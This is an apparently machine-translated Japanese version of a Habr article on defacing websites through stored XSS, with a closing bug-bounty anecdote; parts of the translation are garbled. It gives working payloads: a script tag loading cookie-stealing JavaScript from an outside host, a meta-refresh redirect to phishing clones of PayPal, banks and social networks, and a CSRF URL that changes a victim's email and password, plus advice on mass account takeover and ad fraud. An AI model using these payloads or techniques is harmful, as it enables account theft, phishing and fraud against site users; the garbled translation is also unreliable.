XSSを使用した改ざんサイトの作成

サイトの改ざんは、ftpへのアクセスを取得した場合、シェルをアップロードした場合などに行うことができますが、通常のXSSを使用して行うこともできます。 この記事では、サイトのメインページまたは特定のページのコンテンツを変更して、ユーザーからCookieを大量に盗み 、サイトにリダイレクトするために、 Stored XSSを使用する方法について説明 します

画像 すべての情報は情報提供のみを目的として提供されています。 この記事の資料によって引き起こされる可能性のある損害について、私は責任を負いません。




だから汚職 (ウィキペディア):
改ざん(英語の改ざん-切断、歪曲)-Webサイトのメイン(または他の)ページが別の-通常は反抗的な種類の広告、警告、脅威、または冗談に置き換えられるハッキングサイトのタイプ。
多くの場合、サイトの残りの部分へのアクセスがブロックされるか、サイトの古いコンテンツが完全に削除されます。

ウェブサイトの改ざんの主な原因は次のとおりです。

1.初心者ハッカーの自己主張としてのフーリガン主義。

2.疑わしい製品またはサービスの広告。 このサイトは、広告画像、サイトへのリンク(多くの場合ウイルスに感染しています)などを公開しています。

3.組織間の競争。 ある企業は、ハッキングやサイトの改ざんを通じて、競合企業のイメージと評判の低下をもたらしています。

12年目の例

メインページに保存されたxssは、メインページにユーザーアクティビティを表示するサイトで(私の経験から)最も頻繁に見つかります。 これは基本的に次のとおりです。

*ユーザーが写真1.jpgを追加。
*ユーザーがテーマ/ブログ投稿を作成しました。
*ユーザーがグループに参加しました。
*ユーザーがユーザーを友達として追加しました。

スクリプトをユーザーの名前、写真/グループ/トピックの名前に埋め込み、2つ目のテストアカウントを作成して友人に追加すると、スクリプトがメインページで実行されます。

多数の人がコードを実行するために、メインページにコードを実装する必要はありません。すべてのユーザーの個人アカウント、記事のコメントにコードを実装したり、 country.uaなどのサイトに広告を作成したりできます(3 000ウクライナの出席者)、広告の名前と説明はフィルタリングされますが、ユーザー名には含まれません。



1)xssを記事/トピックのコメントに保存-ここではすべてが簡単です。コメントフィールドにjsを記述し、ログを追加、キャッチします。

2)各ユーザーが個人アカウントでコードを実行するには、 xDsiDORを併用する必要があります。 idorを使用している場合、任意のユーザーのメールアドレスを変更し、アカウントを復元し、ハッキングできます-それは良いことですが、何ももたらさないデータ(メモ、ユーザーアドレスの編集など)を変更できるとしたらどうでしょうか?

この場合、個人アカウントで、PostまたはgetリクエストでユーザーIDを操作し、データを変更し、すべての可能なIDの検索を開始できる場所を見つける必要があります。 保存されたxssがそこにあることが重要です。

フィッシングサイトのメインページに、 盗難スクリプトCookiecsrfエクスプロイトリダイレクトを配置できます。

1)盗難スクリプトCookie

"><script src=https://securityz.net/x.js?> 

Cookieをキャッチできた場合、特にそれらの多くの期間が間もなく終了するため、ユーザーのメールアドレスが Cookieに記録され(アカウントをフックできる)、 パスワードがmd5 (パスワードを保存する多くのサイトを見た)クッキー内)。

httponlyでCookieまたは多くのCookieをソートする時間を無駄にしたくない場合は、2番目のオプションを使用できます。

2)脆弱なサイトのフィッシングサイトへのリダイレクト、バックドアまたはpaypal / privat24 / sberbank /ソーシャルネットワークのクローンをダウンロードするリンク:

 <meta http-equiv="refresh" content="1;URL=https://securityz.net/vk.html" /> 

3) アカウントにcsrfがある場合、csrfエクスプロイトにリダイレクトできます。たとえば、 example.com / account?do=settings&email=support1@habrahabr.ru&city=qwqwqw&address=qwqwwqqw&phone=11111111&password=qwerty&confirmパスワードとパスワードエクスプロイトの直後にログアウトcsrf https://example.com?logoutを使用してユーザーのログインとパスワードを取得し、ユーザーがアカウントにアクセスして復元できないようにすることをお勧めします

おもしろいのは、リダイレクトを使用せず、ページにjsをロードしてCookieを盗むだけの場合、長い間脆弱性が気付かないことがあるということです。

ユーザーを大量にハッキングする方法については、すでにわかっています。 次に、広告から収益を得る方法、またはトラフィックでトップサイトを上げる 方法を説明します。

フィッシングサイトにリダイレクトする代わりに、広告リンクをユーザーに「スリップ」するだけで、ウェブマスターのようなトラフィックからお金を集めることができます。 脆弱性が修正されていない状態で広告から可能な限り多くを取得するために、たとえば月額7,000,000ドルを稼ぐ詐欺師のように 、iframeまたはポップアップウィンドウに広告を読み込みます。広告から。 クリックスルーの支払いを希望する多くの広告主はオンラインで見つけることができます (広告ではありません)

2)2004年、xakep.ruの作成者は、メインサイトにmail.ruカウンターを実装することでサイトを最上位に上げる方法を理解していましたが、同様の方法で行うことができます。

実生活からの私の汚損の2つの例:


2017年2月4日 :報告された脆弱性。
2017年2月4日 :脆弱性が修正されました。
2017年 2 月10日 :200ドルの報酬が転送されました。 彼はこれが普通のxssではなく、汚損であるという事実によって危険を証明しました。
02.16.2017 :800ドルの追加報酬。 この脆弱性の合計は1000ドルです。

記事からの結論 :バグ報奨金で汚損するxss昇格の場合、この脆弱性により多くのお金を得ることができます。

前の記事

Source: https://habr.com/ru/post/J328276/


All Articles